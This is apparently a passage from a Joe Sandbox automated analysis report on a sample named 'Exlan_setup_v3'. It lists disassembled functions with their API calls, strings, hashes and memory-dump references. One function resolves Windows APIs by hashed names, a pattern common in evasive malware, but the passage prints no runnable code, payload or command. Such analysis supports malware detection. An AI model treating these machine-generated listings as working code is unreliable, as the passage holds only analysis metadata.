Part of subcall function 6CFC6880: SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC68FD
Part of subcall function 6CFC6880: VariantClear.OLEAUT32(?), ref: 6CFC6909
Part of subcall function 6CFC6880: SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC6923
Part of subcall function 6CFC6880: SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC6981

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArraySafe$ClearInit$Element$CreateDestroyVector$CopyException@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4028882980-0
Opcode ID: a9664a2cf2ae7717b57501f9ad14913bede80713f7127ea860936d1dd2c1a7e3
Instruction ID: d397705b5ce9e217dae14ab3407a32ab480f0dd9f18dc988f08c72adf5c226bf
Opcode Fuzzy Hash: a9664a2cf2ae7717b57501f9ad14913bede80713f7127ea860936d1dd2c1a7e3
Instruction Fuzzy Hash: E7B156722093029FD704CF68C884B5BBBF8FF89714F148A5DE99987690E734E905CB92

Function 6CFC3690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFC36CD
VariantInit.OLEAUT32(?), ref: 6CFC36DA
VariantInit.OLEAUT32(?), ref: 6CFC36E0
VariantInit.OLEAUT32(?), ref: 6CFC36E6
VariantInit.OLEAUT32 ref: 6CFC37DD
VariantCopy.OLEAUT32(?,?), ref: 6CFC37E4
VariantInit.OLEAUT32 ref: 6CFC3815
VariantCopy.OLEAUT32(?,?), ref: 6CFC381C
VariantClear.OLEAUT32(?), ref: 6CFC38A8
VariantClear.OLEAUT32(?), ref: 6CFC38AE
VariantClear.OLEAUT32(?), ref: 6CFC38B4
VariantClear.OLEAUT32(?), ref: 6CFC38BA

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 567f39513649f1019284cd1009f1ddd4cc24761eb29772e7d3c6ca584ff03741
Instruction ID: d0d2119a88643ce4b3191f398213f49de032d71d30a9e302aa515388fdb25d16
Opcode Fuzzy Hash: 567f39513649f1019284cd1009f1ddd4cc24761eb29772e7d3c6ca584ff03741
Instruction Fuzzy Hash: 73819D71A0521AAFDB04DFA8C884FEEBBB9FF49304F14415DE505A7640DB34E909CB91

Function 6CFC4BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFC4BDC
VariantInit.OLEAUT32(?), ref: 6CFC4BE5
VariantInit.OLEAUT32(?), ref: 6CFC4BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFC4BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC4C2A
VariantClear.OLEAUT32(?), ref: 6CFC4C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC5107
VariantClear.OLEAUT32(?), ref: 6CFC5117
VariantClear.OLEAUT32(?), ref: 6CFC511D
VariantClear.OLEAUT32(?), ref: 6CFC5123

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 302fad0f1167ce15501672b76647a89ec1bc3e6049461a54b875530e775df21a
Instruction ID: 68db58b5cc4f829263784a90457e32df20087985c92c6297c5bc24b2d57f87ff
Opcode Fuzzy Hash: 302fad0f1167ce15501672b76647a89ec1bc3e6049461a54b875530e775df21a
Instruction Fuzzy Hash: D412F675A15706AFC758DB98DD84DAAB3B9BF8D300F14466CF50AABB91CA30F841CB50

Function 6CFC49B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6D0205A8), ref: 6CFC49EE
VariantInit.OLEAUT32(?), ref: 6CFC49F7
VariantInit.OLEAUT32(?), ref: 6CFC49FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFC4A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC4A39
VariantClear.OLEAUT32(?), ref: 6CFC4A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC4B66
VariantClear.OLEAUT32(?), ref: 6CFC4B76
VariantClear.OLEAUT32(?), ref: 6CFC4B7C
VariantClear.OLEAUT32(6D0205A8), ref: 6CFC4B82

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 82e6110754342a999b1f970f8d46b7f7f69addba03883a07f08327c5b771082a
Instruction ID: 7ab88f9f08b445257e32cc67f7df9b44515ba3dfdda4255e3121bd3b428ea088
Opcode Fuzzy Hash: 82e6110754342a999b1f970f8d46b7f7f69addba03883a07f08327c5b771082a
Instruction Fuzzy Hash: CA516F72A0421AAFDB04DFA4CC80EAFBBB8FF99314F144169F915AB645D734E901CB90

Function 6CFC47D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFC480C
VariantInit.OLEAUT32(?), ref: 6CFC4815
VariantInit.OLEAUT32(?), ref: 6CFC481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFC4826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CFC485B
VariantClear.OLEAUT32(?), ref: 6CFC4868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC4974
VariantClear.OLEAUT32(?), ref: 6CFC4984
VariantClear.OLEAUT32(?), ref: 6CFC498A
VariantClear.OLEAUT32(?), ref: 6CFC4990

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 4a2d8d3c267e40e931671e7a2e2fdedde3d791225ddea5af617e9c64d5a118ba
Instruction ID: 99f2c7bf5056af0bce914176f7850273d3e6553e3b4917230127c70649397cf7
Opcode Fuzzy Hash: 4a2d8d3c267e40e931671e7a2e2fdedde3d791225ddea5af617e9c64d5a118ba
Instruction Fuzzy Hash: 0B514C72A0525AAFDB04DFA4CC80EEEBBB9FF89314F14456DE505EB640D730A905CB61

Function 6CFBDCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFBDD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CFBDD10
SafeArrayPutElement.OLEAUT32(00000000,6CFC2FFF,?), ref: 6CFBDD47
VariantClear.OLEAUT32(?), ref: 6CFBDD4F
SafeArrayPutElement.OLEAUT32(00000000,6CFC2FFF,?), ref: 6CFBDD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CFBDDA4
VariantClear.OLEAUT32(?), ref: 6CFBDDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFBDE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFBDE27
VariantClear.OLEAUT32(?), ref: 6CFBDE31

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: f19958387cfd5cf139efb63d65dca49f61540d196642a057f98f5399242d7942
Instruction ID: c4db6e5819a0ca579d5a1519851ce6be2c9c22e4f9d209afa0577367eba3b9a6
Opcode Fuzzy Hash: f19958387cfd5cf139efb63d65dca49f61540d196642a057f98f5399242d7942
Instruction Fuzzy Hash: CF515A75A01609AFDB00DFA5C884FDEBBB8EF9D300F118129EA15A7254DB34D901CBA0

Function 6CFB8470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 270COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6CFB5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CFB84EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CFB84F0
std::exception::exception.LIBCMT ref: 6CFB853C
__CxxThrowException@8.LIBCMT ref: 6CFB8551
__cftoe.LIBCMT ref: 6CFB88ED

Part of subcall function 6D00A116: __mbstowcs_s_l.LIBCMT ref: 6D00A12C

__cftoe.LIBCMT ref: 6CFB8911

Strings

zX, xrefs: 6CFB865E
P, xrefs: 6CFB8841

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalInitializeSection__cftoe$Exception@8Throw__mbstowcs_s_l_mallocstd::exception::exception
String ID: zX$P
API String ID: 689832159-2079734279
Opcode ID: 9d22b36e7cc100fbf4dea536f5c003d6925de4ff25f4ea328e91d9fd2cc3f061
Instruction ID: 35de5b20a5a65c0a345b788a00aae7faa47e5ec84674318371b803be90eaecc1
Opcode Fuzzy Hash: 9d22b36e7cc100fbf4dea536f5c003d6925de4ff25f4ea328e91d9fd2cc3f061
Instruction Fuzzy Hash: AAC144B15087819FD375CF15C880BABBBF8FB84714F508A1EE5998B680DB31A645CF92

Function 6CFB12A0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFB12DD
std::_Xinvalid_argument.LIBCPMT ref: 6CFB12FB
_memmove.LIBCMT ref: 6CFB1368
_memmove.LIBCMT ref: 6CFB139F
std::_Xinvalid_argument.LIBCPMT ref: 6CFB140C

Strings

invalid string position, xrefs: 6CFB1407
string too long, xrefs: 6CFB12D8, 6CFB12F6

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 2c55e83a6321770ba9f76eb9ce5d97bfd57a278dfb62b41eb4ecee797fb5c1e8
Instruction ID: 3596ef9c08f3247b01a962487b6995a8983f09759eca82bad07be5208735a020
Opcode Fuzzy Hash: 2c55e83a6321770ba9f76eb9ce5d97bfd57a278dfb62b41eb4ecee797fb5c1e8
Instruction Fuzzy Hash: 0F41B6323052049BE714CE5EECD0A5FB3AAEF853547388A2EE492D7E41E770D845C7A1

Function 6CFD1B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CFD1C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CFD1C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CFD1CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CFD1CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CFD1CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CFD1D0A

Strings

User32.dll, xrefs: 6CFD1C57, 6CFD1C64
kernel32.dll, xrefs: 6CFD1CBA, 6CFD1CC7

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: 070d15a60bc565b0450bfdc24ba931becf1eb2b5eb85323608cebc76211f14bf
Instruction ID: 2250298325160c8f67242752285dfa6adcdc7a7d6d6ad350fd7bec1d654553ee
Opcode Fuzzy Hash: 070d15a60bc565b0450bfdc24ba931becf1eb2b5eb85323608cebc76211f14bf
Instruction Fuzzy Hash: F3614A75204B019FD720CF58C581B6BBBF2FB46320F698A58D4969BE52D736F846CB80

Function 6D014409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6D01442E

Part of subcall function 6D013FC9: Replicator::operator[].LIBCMT ref: 6D01404C
Part of subcall function 6D013FC9: DName::operator+=.LIBCMT ref: 6D014054

DName::operator+.LIBCMT ref: 6D014487
DName::DName.LIBCMT ref: 6D0144DF

Strings

<ellipsis>, xrefs: 6D0144C9, 6D0144CE
void, xrefs: 6D0144D7
,<ellipsis>, xrefs: 6D01447A, 6D01447F
..., xrefs: 6D0144C2
,..., xrefs: 6D014473

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: c45d33bd1d0bfd358dc63f400e28fa5452262ec27b68be5fefd09c5028f440bf
Instruction ID: 2e2b2060cfaa211383bcf80829dd2e8cbec6a8264fcc44991ea0c35c1b108493
Opcode Fuzzy Hash: c45d33bd1d0bfd358dc63f400e28fa5452262ec27b68be5fefd09c5028f440bf
Instruction Fuzzy Hash: 7B2180B0609119EFEB01DF98C940F697BF4EB4A39DB04D199E845CB266CB30D947CB54

Function 6D015D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6D015D40
DName::DName.LIBCMT ref: 6D015D4C

Part of subcall function 6D013B3B: DName::doPchar.LIBCMT ref: 6D013B6C

UnDecorator::getScopedName.LIBCMT ref: 6D015D8B
DName::operator+=.LIBCMT ref: 6D015D95
DName::operator+=.LIBCMT ref: 6D015DA4
DName::operator+=.LIBCMT ref: 6D015DB0
DName::operator+=.LIBCMT ref: 6D015DBD

Strings

void, xrefs: 6D015D9C

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 6fdec4094f83727198ccdf32ff2097578b280c496f2040eb6e7686f68f1a4ec3
Instruction ID: 59a7538aaa38ff69a33fb83b64e6605149f50229229c22e7dc143160d705f17b
Opcode Fuzzy Hash: 6fdec4094f83727198ccdf32ff2097578b280c496f2040eb6e7686f68f1a4ec3
Instruction Fuzzy Hash: 0F11C2B490C244AFF705DBE8CC8DBBC7BB0AB05304F458098D515AB2E1DF709A4ACB40

Function 6CFC3F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CFC3F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFC3F8D
VariantInit.OLEAUT32(?), ref: 6CFC3FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CFC3FD0
VariantClear.OLEAUT32(?), ref: 6CFC40C9
VariantClear.OLEAUT32(?), ref: 6CFC4105
SafeArrayDestroy.OLEAUT32(?), ref: 6CFC4123
VariantClear.OLEAUT32(?), ref: 6CFC4157
VariantClear.OLEAUT32(?), ref: 6CFC4168

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: 2bb02a82898c69a016f7c5e13de03a0025845df40ca944428bed5a4ac4d1b121
Instruction ID: 0654e79384c45b264d3e50c918e595f3c40b5aa37224e04f7cd50d130d1ce5ee
Opcode Fuzzy Hash: 2bb02a82898c69a016f7c5e13de03a0025845df40ca944428bed5a4ac4d1b121
Instruction Fuzzy Hash: 917158763093829FC700DF68C8C4A6BBBF8BB99304F244A6CF59587650C731E949CB92

Function 6CFB0CD0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFB0D3A
std::_Xinvalid_argument.LIBCPMT ref: 6CFB0D60
_memmove.LIBCMT ref: 6CFB0D95
std::_Xinvalid_argument.LIBCPMT ref: 6CFB0DBF
_memmove.LIBCMT ref: 6CFB0E3E

Strings

invalid string position, xrefs: 6CFB0D35
string too long, xrefs: 6CFB0D5B, 6CFB0DBA

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 14e1823427c5defb5f79c6ecfcd210eb0925e385e85415f44ebfc169aae78f56
Instruction ID: 6574cc95524cb15e5a04c6a008bc8ae31d59bce140451f43b9a4a7ca1e413e5c
Opcode Fuzzy Hash: 14e1823427c5defb5f79c6ecfcd210eb0925e385e85415f44ebfc169aae78f56
